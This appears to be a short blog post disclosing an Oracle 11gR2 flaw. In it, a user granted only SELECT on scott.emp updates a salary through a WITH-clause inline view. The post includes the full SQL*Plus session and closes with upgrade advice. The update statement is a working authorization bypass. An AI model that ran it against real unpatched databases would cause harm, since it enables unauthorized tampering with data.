I’m going to talk about a problem I tested in 11gr2 versions.
Each user with a select permission in a table can update that table.
You can try the following steps in the database.
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 |
[oracle@oradb ~]$ sqlplus / as sysdba SQL*Plus: Release 11.2.0.3.0 Production on Wed May 6 16:08:48 2015 Copyright (c) 1982, 2011, Oracle. All rights reserved. Connected to: Oracle Database 11g Enterprise Edition Release 11.2.0.3.0 - 64bit Production With the Partitioning, Real Application Clusters, Automatic Storage Management, OLAP, Data Mining and Real Application Testing options SQL> create user test identified by test; User created. SQL> grant create session,create table to test; Grant succeeded. SQL> grant select on scott.emp to test; Grant succeeded. SQL> exit Disconnected from Oracle Database 11g Enterprise Edition Release 11.2.0.3.0 - 64bit Production With the Partitioning, Real Application Clusters, Automatic Storage Management, OLAP, Data Mining and Real Application Testing options [oracle@oradb ~]$ sqlplus test/test SQL*Plus: Release 11.2.0.3.0 Production on Wed May 6 16:10:05 2015 Copyright (c) 1982, 2011, Oracle. All rights reserved. Connected to: Oracle Database 11g Enterprise Edition Release 11.2.0.3.0 - 64bit Production With the Partitioning, Real Application Clusters, Automatic Storage Management, OLAP, Data Mining and Real Application Testing options SQL> update (with tmp as (select * from scott.emp) select * from tmp) set sal=1500 where ename='ALLEN'; 1 row updated. SQL> commit; Commit complete. |
To resolve this vulnerability, upgrade to 11.2.0.4.5 with the latest patch level or later.